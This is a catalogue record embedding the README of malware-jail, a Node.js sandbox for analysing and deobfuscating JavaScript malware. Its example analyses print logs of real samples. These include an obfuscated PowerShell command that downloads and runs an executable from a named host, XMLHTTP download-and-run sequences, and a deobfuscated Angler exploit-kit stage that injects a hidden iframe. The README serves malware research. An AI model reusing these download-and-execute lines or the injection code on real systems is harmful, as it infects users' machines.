{"id":13800102,"url":"https://github.com/HynekPetrak/malware-jail","last_synced_at":"2025-05-13T09:31:10.483Z","repository":{"id":46750742,"uuid":"49388942","full_name":"HynekPetrak/malware-jail","owner":"HynekPetrak","description":"Sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. Written for Node.js","archived":false,"fork":false,"pushed_at":"2023-06-16T16:17:47.000Z","size":5242,"stargazers_count":460,"open_issues_count":5,"forks_count":100,"subscribers_count":46,"default_branch":"master","last_synced_at":"2024-11-18T15:01:49.495Z","etag":null,"topics":["analysis","angler","deobfuscation","javascript","malware-analysis","malware-analyzer","malware-jail","malware-research","malware-samples","payload","payload-extraction","wscript"],"latest_commit_sha":null,"homepage":"","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/HynekPetrak.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2016-01-10T22:41:24.000Z","updated_at":"2024-10-05T12:50:24.000Z","dependencies_parsed_at":"2024-11-18T14:51:55.466Z","dependency_job_id":"c8921591-d3c9-4b34-8024-23e78fc656aa","html_url":"https://github.com/HynekPetrak/malware-jail","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fmalware-jail","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fmalware-jail/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/Gi
tHub/repositories/HynekPetrak%2Fmalware-jail/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fmalware-jail/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/HynekPetrak","download_url":"https://codeload.github.com/HynekPetrak/malware-jail/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253913027,"owners_count":21983244,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["analysis","angler","deobfuscation","javascript","malware-analysis","malware-analyzer","malware-jail","malware-research","malware-samples","payload","payload-extraction","wscript"],"created_at":"2024-08-04T00:01:09.316Z","updated_at":"2025-05-13T09:31:07.389Z","avatar_url":"https://github.com/HynekPetrak.png","language":"JavaScript","funding_links":[],"categories":["Tools","JavaScript","Malware"],"sub_categories":["Detecting","Dependencies"],"readme":"# malware-jail\nSandbox for semi-automatic JavaScript malware analysis, deobfuscation and payload extraction. Written for Node.js\n\nmalware-jail is written for [Node's 'vm' sandbox](https://nodejs.org/api/vm.html). It currently implements the \nWScript (Windows Scripting Host) context in [env/wscript.js](https://github.com/HynekPetrak/malware-jail/blob/master/env/wscript.js), at least the part frequently used\nby malware. The Internet browser context is partially implemented in [env/browser.js](https://github.com/HynekPetrak/malware-jail/blob/master/env/browser.js).\n\nRuns on any operating system. 
Developed and tested on Linux, Node.js v6.6.0.\n\nDue to the use of some ES6 features, you'll need Node.js \u003e= 6.x.\n\n\u003e See [EXAMPLES](EXAMPLES.md) for the malware samples analyzed.\n\n\u003e If you have new malware samples, please submit them to [javascript-malware-collection](https://github.com/HynekPetrak/javascript-malware-collection), either via issue or pull request.\n\n## New features ##\n\n### Version 0.19 ###\n\nEnumerates WMI queries into a file: [wmis.json](https://github.com/HynekPetrak/malware-jail/blob/master/malware/20161013/out/wmis.json)\n\n### Version 0.17 ###\n\nAdded new parameter:\n\n    --t404 - HTTP requests always return HTTP/404 and throw an exception. This enables enumeration of all remote URLs.\n\n### Version 0.16 ###\n\nURLs are now saved to urls.json. See the latest [EXAMPLES#malware-of-issue-14](https://github.com/HynekPetrak/malware-jail/blob/master/EXAMPLES.md#malware-of-issue-14).\n\nVarious bug fixes and improvements.\n\n### Version 0.14 ###\n\nVarious bug fixes and improvements.\n\n### Version 0.13 ###\n\nAdded new parameters:\n\n    -t msecs - limits execution time to \"msecs\" milliseconds, 60 seconds by default.\n    --h404 - HTTP requests always return HTTP/404 and do not throw an exception. This enables enumeration of all remote URLs.\n\n## Installing ##\n\nYou'll need [Node.js](https://nodejs.org) and [npm](https://npmjs.org/) installed.\n\nmalware-jail is built on top of [minimist](https://www.npmjs.com/package/minimist), [iconv-lite](https://github.com/ashtuchkin/iconv-lite) \nand [entities](https://www.npmjs.com/package/entities).\n\n### Pull from GitHub ###\n\nPull the source with git:\n\n    git clone https://github.com/HynekPetrak/malware-jail.git\n    cd malware-jail\n\nThen install all the dependencies (minimist, entities, iconv-lite) with:\n\n    npm install\n\n### NPM Package ###\n\nNot yet available, coming soon ...\n\n## Warning ##\n\n\u003e Be careful when working with real malware. 
Malware that is aware of this sandbox may try to escape and harm your PC. \n\u003e It's recommended that you run it either from an unprivileged Linux account or from within a virtualized Windows machine.\n\u003e Angler files in the malware folder are NOT disarmed.\n\n## Usage ##\n\n    bash@linux# node jailme.js -h -b list\n    7 May 20:54:52 - malware-jail, a malware sandbox ver. 0.19\n    7 May 20:54:52 - ------------------------\n    7 May 20:54:52 - Usage: node jailme.js  [[-e file1] [-e file2] .. ] [-c ./config.json] \\\n    7 May 20:54:52 -                [-o ofile] [-b id] \\\n    7 May 20:54:52 -                [-s odir] [--down] [malware1 [malware2] .. ]\n    7 May 20:54:52 -        -c config .. use alternative config file, preceed with ./\n    7 May 20:54:52 -        -e ifile ... js that simulates specific environment\n    7 May 20:54:52 -        -o ofile ... name of the file where sandbox shall be dumped at the end\n    7 May 20:54:52 -        -s odir  ... output directory for generated files (malware payload)\n    7 May 20:54:52 -        -b id    ... browser type, use -b list for possible values\n    7 May 20:54:52 -        -t msecs ... number of miliseconds before terminating execution, default 1 minute\n    7 May 20:54:52 -        --trace  ... print stack trace with every log line\n    7 May 20:54:52 -        --down   ... allow downloading malware payloads from remote servers\n    7 May 20:54:52 -        --h404   ... on download return always HTTP/404\n    7 May 20:54:52 -        malware  ... js with the malware code\n    7 May 20:54:52 - If no arguments are specified the default values are taken from config.json\n    7 May 20:54:52 - Possible -b values: [ 'IE11_W10', 'IE8', 'IE7', 'iPhone', 'Firefox', 'Chrome' ]\n\nIn the examples folder you may find a deactivated malware file. 
Run the analysis with:\n\n    node jailme.js -c ./config_wscript_only.json --down=y malware/example.js\n\nInternet-browser-based malware can be tested with:\n\n    node jailme.js -b IE11_W10 malware/example_browser.js\n\nAt the end of the analysis the complete sandbox context is dumped into a _'sandbox\\_dump\\_after.json'_ file.\n\nYou may want to examine the following entries of _'sandbox\\_dump\\_after.json'_:\n\n* _eval\\_calls_ - array of the arguments of all eval() calls. Useful if eval() is used for deobfuscation.\n* _wscript\\_saved\\_files_ - the content of all files that the malware attempted to drop. The actual files are saved into the output/ directory too.\n* _wscript\\_urls_ - all URLs that the malware intended to GET or POST.\n* _wscript\\_objects_ - WScript or ActiveX objects created.\n\n_'sandbox\\_dump\\_after.json'_ uses [JSONPath](http://goessner.net/articles/JsonPath/), implemented by [JSON-js/cycle.js](https://github.com/douglascrockford/JSON-js), to save duplicated or cyclic references to the same object.\n\n## Sample output ##\n\n    bash@linux# node jailme.js malware/example.js\n    11 Jan 00:06:24 - Malware sandbox ver. 
0.2\n    11 Jan 00:06:24 - ------------------------\n    11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js\n    11 Jan 00:06:24 - Malware files: malware/example.js\n    11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json\n    11 Jan 00:06:24 - Output directory for generated files: output/\n    11 Jan 00:06:24 - ==\u003e Preparing Sandbox environment.\n    11 Jan 00:06:24 -  =\u003e Executing: env/eval.js\n    11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.\n    11 Jan 00:06:24 -  =\u003e Executing: env/wscript.js\n    11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.\n    11 Jan 00:06:24 - ==\u003e Executing malware file(s).\n    11 Jan 00:06:24 -  =\u003e Executing: malware/example.js\n    11 Jan 00:06:24 - ActiveXObject(WScript.Shell)\n    11 Jan 00:06:24 - Created: WScript.Shell[1]\n    11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)\n    11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)\n    11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]\n    11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)\n    11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)\n    11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065\u0026jndj=IT0601)\n    11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y\n    11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data\n    11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)\n    11 Jan 00:06:24 - Created: ADODB_Stream[3]\n    11 Jan 00:06:24 - ADODB_Stream[3].Open()\n    11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes\n    11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\\57020551.dll, 2)\n    11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\\57020551.dll, DllRegisterServer)\n    11 Jan 00:06:24 - ADODB_Stream[3].Close()\n    11 Jan 00:08:42 - ==\u003e 
Script execution finished, dumping sandbox environment to a file.\n    11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll\n    11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf\n    11 Jan 00:08:42 - Generated file saved\n    11 Jan 00:08:42 - Generated file saved\n    11 Jan 00:08:42 - The sandbox context has been  saved to: sandbox_dump_after.json\n\nIn the above example the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf.\n\n## Examples ##\n\nThe [malware](malware) folder contains real-world malware samples. Most of them were downloaded from https://malwr.com. \n\nPlease see [EXAMPLES](EXAMPLES.md) for a complete index of malware samples.\n\n### Example: Analysing Wileen.js ###\n\nTaking a malicious script from malwr.com: [Wileen.js](https://malwr.com/analysis/NTVkZDQ4MGZkZWE4NDAyM2EwODEyMDM3MDhjMDI1MTQ/)\n\nApparently the malware does not execute if run from within a browser:\n\n    if (typeof document == \"undefined\") {\n\nTherefore you may want to use an alternate config file, which does not load browser/DOM components:\n\n    node jailme.js --down=y -c ./config_wscript_only.json  malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js \n\nInteresting use of PowerShell:\n\n    1 Oct 13:05:34 -  =\u003e Executing: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js\n    1 Oct 13:05:34 - ActiveXObject(WScRipT.SHEll)\n    1 Oct 13:05:34 - Created: WScript.Shell[1]\n    1 Oct 13:05:34 - WScript.Shell[1].Run(cmD.EXE /c POWE^R^s^he^lL.eXE     -ExEc^U^Tio^n^p^oLIC^y^   B^Y^pas^S -NOpro^Fi^L^e^    -^W^InD^Ow^sT^yle^  HI^ddeN^  (^Ne^W^-^OBJ^ecT^     S^YST^EM.net.Webc^L^I^E^n^T^).^dOWn^L^Oa^d^fI^lE^(^'http://click.doubledating.ru/js/boxun4.bin','%appdatA%.exE')^;^stA^Rt-^p^rO^c^eS^s  ^'%aPpdata%.eXe', false, undefined)\n    1 Oct 13:05:34 - ==\u003e Cleaning up sandbox.\n    1 Oct 13:05:34 - ==\u003e Script execution finished, dumping sandbox environment to a file.\n   
 1 Oct 13:05:34 - The sandbox context has been  saved to: sandbox_dump_after.json\n    \nLog file: [malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out](malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out)\n\n### Example: Analysing ORDER-10455.js ###\n\nTaking malicious JavaScript from malwr.com: [ORDER-10455.js](https://malwr.com/analysis/NDU1ZDA4NmY3ZGUyNDczZjg0ODU2OGZiZTMxNjA5NzE/)\n\nFirst run without interaction with remote servers:\n\n    node jailme.js malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js\n\nyou get something like:\n    \n    ... \n    29 Sep 23:17:21 - Calling eval() no.: 5\n    29 Sep 23:17:21 - ActiveXObject(MSXML2.XMLHTTP)\n    29 Sep 23:17:21 - Created: MSXML2.XMLHTTP[9]\n    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].open(GET,http://caopdjow.top/user.php?f=0.dat,false)\n    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined)\n    29 Sep 23:17:21 - MSXML2.XMLHTTP[9] Not sending data, if you want to interact with remote server, set --down=y\n    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].responseBody = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)'\n    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status = '200'\n    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined) finished\n    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status.get() =\u003e 200\n    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() =\u003e aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... 
(truncated)\n    29 Sep 23:17:21 - ActiveXObject(Scripting.FileSystemObject)\n    29 Sep 23:17:21 - Scripting.FileSystemObject[10] created.\n    29 Sep 23:17:21 - Scripting.FileSystemObject[10].GetSpecialFolder(2)\n    29 Sep 23:17:21 - ActiveXObject(ADODB.Stream)\n    29 Sep 23:17:21 - Created: ADODB_Stream[11]\n    29 Sep 23:17:21 - ADODB_Stream[11].Open()\n    29 Sep 23:17:21 - ADODB_Stream[11].Type = '1'\n    29 Sep 23:17:21 - ADODB_Stream[11].content = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)'\n    29 Sep 23:17:21 - ADODB_Stream[11].Write(str) - 10000 bytes\n    29 Sep 23:17:21 - ADODB_Stream[11].size = '10000'\n    29 Sep 23:17:21 - ADODB_Stream[11].Position = '0'\n    29 Sep 23:17:21 - ADODB_Stream[11].SaveToFile(Special_Folder__2\\w8z05i7y2.exe, 2)\n    29 Sep 23:17:21 - ADODB_Stream[11].content.get() =\u003e aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)\n    29 Sep 23:17:21 - ADODB_Stream[11].Close()\n    29 Sep 23:17:21 - ActiveXObject(WScript.Shell)\n    29 Sep 23:17:21 - Created: WScript.Shell[12]\n    29 Sep 23:17:21 - WScript.Shell[12].Run(Special_Folder__2\\w8z05i7y2.exe, undefined, undefined)\n    29 Sep 23:17:21 - Returning: 'undefined'\n    29 Sep 23:17:21 - ==\u003e Cleaning up sandbox.\n    29 Sep 23:17:21 - ==\u003e Script execution finished, dumping sandbox environment to a file.\n    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() =\u003e aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... 
(truncated)\n    29 Sep 23:17:21 - Saving: output/Special_Folder__2_w8z05i7y2.exe\n    29 Sep 23:17:21 - Generated file saved\n    29 Sep 23:17:21 - The sandbox context has been  saved to: sandbox_dump_after.json\n\nThis seems to be the \"standard\" deobfuscation behaviour: in the end an exe binary is downloaded and executed.\n\nTo get the real payload, run it with '--down=y':\n\n    node jailme.js --down=y malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js \u003e malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out\n\nLog file: [malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out](malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out)\n\n### Example: Analysing Norri.js ###\n\nTaking malicious JavaScript from malwr.com: [Norri.js](https://malwr.com/analysis/Mjc0ZjUyMjZhYzg4NDJlYmEwNzBkMTAxODA5NGYwZGM/)\n\nRun:\n\n    node jailme.js --down=y malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js\n\nYou get:\n\n    30 Sep 01:02:11 -  =\u003e Executing: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js\n    30 Sep 01:02:11 - Strict mode: false\n    30 Sep 01:02:11 - Calling eval() no.: 1\n    30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)\n    30 Sep 01:02:11 - Created: WScript.Shell[9]\n    30 Sep 01:02:11 - WScript.SpecialFolders(Desktop)\n    30 Sep 01:02:11 - WScript.CreateShortcut(Desktop/?eno.lnk)\n    30 Sep 01:02:11 - Created: WshShortcut[10](Desktop/?eno.lnk)\n    30 Sep 01:02:11 - WshShortcut[10](Desktop/?eno.lnk).FullName.get() =\u003e Desktop/?eno.lnk\n    30 Sep 01:02:11 - WScript.CreateObject(Scripting.FileSystemObject)\n    30 Sep 01:02:11 - Scripting.FileSystemObject[11] created.\n    30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)\n    30 Sep 01:02:11 - Created: WScript.Shell[12]\n    30 Sep 01:02:11 - 
WScript.CreateObject(MSXML2.XMLHTTP)\n    30 Sep 01:02:11 - Created: MSXML2.XMLHTTP[13]\n    30 Sep 01:02:11 - WScript.CreateObject(ADODB.Stream)\n    30 Sep 01:02:11 - Created: ADODB_Stream[14]\n    30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetSpecialFolder(2) =\u003e TemporaryFolder/\n    30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetTempName() =\u003e TempFile[15]\n    30 Sep 01:02:11 - MSXML2.XMLHTTP[13].open(GET,http://girlx.tornadodating.ru/js/boxun4.bin,0)\n    30 Sep 01:02:11 - MSXML2.XMLHTTP[13] string true\n    30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async = 'false'\n    30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async.get() =\u003e false\n    30 Sep 01:02:11 - MSXML2.XMLHTTP[13].send(undefined)\n    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange(), readyState = 4 length: 196608 status: 200\n    30 Sep 01:02:15 - MSXML2.XMLHTTP[13] statusText = null\n    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].responseBody = 'MZ?@?!?L?!This program cannot be ... (truncated)'\n    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].status = '200'\n    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange() undefined\n    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].send(undefined) finished\n    30 Sep 01:02:15 - ADODB_Stream[14].type = '1'\n    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() =\u003e MZ?@?!?L?!This program cannot be ... (truncated)\n    30 Sep 01:02:15 - ADODB_Stream[14].Open()\n    30 Sep 01:02:15 - ADODB_Stream[14].content = 'MZ?@?!?L?!This program cannot be ... (truncated)'\n    30 Sep 01:02:15 - ADODB_Stream[14].Write(str) - 196608 bytes\n    30 Sep 01:02:15 - ADODB_Stream[14].size = '196608'\n    30 Sep 01:02:15 - ADODB_Stream[14].SaveToFile(TemporaryFolder/TempFile[15], undefined)\n    30 Sep 01:02:15 - ADODB_Stream[14].content.get() =\u003e MZ?@?!?L?!This program cannot be ... 
(truncated)\n    30 Sep 01:02:15 - ADODB_Stream[14].Close()\n    30 Sep 01:02:15 - WScript.Shell[12].Run(cmd.exe /c TemporaryFolder/TempFile[15], 0, undefined)\n    30 Sep 01:02:15 - Scripting.FileSystemObject[11].DeleteFile(script_full_name.js)\n    30 Sep 01:02:15 - ==\u003e Cleaning up sandbox.\n    30 Sep 01:02:15 - ==\u003e Script execution finished, dumping sandbox environment to a file.\n    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() =\u003e MZ?@?!?L?!This program cannot be ... (truncated)\n    30 Sep 01:02:16 - Saving: output/TemporaryFolder_TempFile[15]\n    30 Sep 01:02:16 - Generated file saved\n    30 Sep 01:02:16 - The sandbox context has been  saved to: sandbox_dump_after.json\n\nThe behaviour is obvious from the log. The payload has been extracted into the output/TemporaryFolder_TempFile[15] file.\n\nLog file: [malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out](malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out)\n\n### Example: Analysing Angler EK ###\n\nDownload and extract Angler EK from the pcap file at [ANGLER EK SENDS CRYPTOWALL](http://www.malware-traffic-analysis.net/2015/12/21/index.html) into [malware/angler/angler_full.html](malware/angler/angler_full.html).\n\nStrip the non-Angler part and save it as [malware/angler/angler_stripped.html](malware/angler/angler_stripped.html).\n\nRemove the `\u003cscript\u003e` tags and convert the required `\u003cdiv\u003e` tags into:\n\n    document._addElementById(id, content);\n\nand save the result as [malware/angler/angler.js](malware/angler/angler.js).\n\nRun the analysis:\n\n    node jailme.js malware/angler/angler.js\n\nOptionally, capture the output into [angler_output.txt](malware/angler/angler_output.txt):\n\n    node jailme.js malware/angler/angler.js \u003e malware/angler/angler_output.txt\n\nDeobfuscating the final stage:\n\n    function() {\n        if (document.body != null \u0026\u0026 typeof document.body != \"undefined\") {\n 
           clearInterval(zfxhYOGvfrlHUNJrZufQnWPtohkYAQEEdV);\n            if (typeof window[\"v_bcd50d9482665cd4e129a272c76799e6\"] == \"undefined\") {\n                window[\"v_bcd50d9482665cd4e129a272c76799e6\"] = 1;\n                var YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr = (DfPJmMLOnxPanSoeHQuOrDdSoCPJGAaRhYURtgyUD() \u0026\u0026 CCtJDLZQbieboJvsIyatBMZhUvTpzaQcyCXR());\n                var YBMlxOjmRXjqriuNuiEQPAJsQuuwPLiQW = !YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr \u0026\u0026 !!window.chrome \u0026\u0026 window.navigator.vendor === \"Google Inc.\";\n                var rfddjrtkllJefuAgPfwCNdpgltcAYetudMCia = -1;\n                var NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS = \"http://beladonna33.ga/052F\";\n                if (hgvANEpEuWeKcGvvwzyKQIhEoKIHuYnyaOtvVW() \u0026\u0026 rfddjrtkllJefuAgPfwCNdpgltcAYetudMCia == 1) {\n                    if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {\n                        location.replace(NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS)\n                    } else {\n                        window.location = NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS;\n                        document.location = NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS\n                    }\n                } else {\n                    if ((YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr \u0026\u0026 !YBMlxOjmRXjqriuNuiEQPAJsQuuwPLiQW \u0026\u0026 !hgvANEpEuWeKcGvvwzyKQIhEoKIHuYnyaOtvVW())) {\n                        var blDiNORLBvDHjFRqgxXSMVgnfhriGmw = \"\u003cdiv style=\\\"position:absolute;left:-2808px;\\\"\u003e\u003ciframe width=\\\"27px\\\" src=\\\"\" + NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS + \"\\\" height=\\\"27px\\\"\u003e\u003c/iframe\u003e\u003c/div\u003e\";\n                        var wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL = document.getElementsByTagName(\"div\");\n                        if (wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL.length == 0) {\n                            document.body.innerHTML = document.body.innerHTML + 
blDiNORLBvDHjFRqgxXSMVgnfhriGmw\n                        } else {\n                            var dl_name = wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL.length;\n                            var eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc = Math.floor((dl_name / 2));\n                            wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL[eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc].innerHTML = wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL[eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc].innerHTML + blDiNORLBvDHjFRqgxXSMVgnfhriGmw\n                        }\n                    }\n                }\n            }\n            OncYaaSjwrEWhyHWevaHtkypMUSZxnIrtIK()\n        }\n    }\n\n\n## License ##\n\nThe MIT License (MIT)\n\nCopyright (c) 2016 Hynek Petrak\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FHynekPetrak%2Fmalware-jail","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FHynekPetrak%2Fmalware-jail","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FHynekPetrak%2Fmalware-jail/lists"}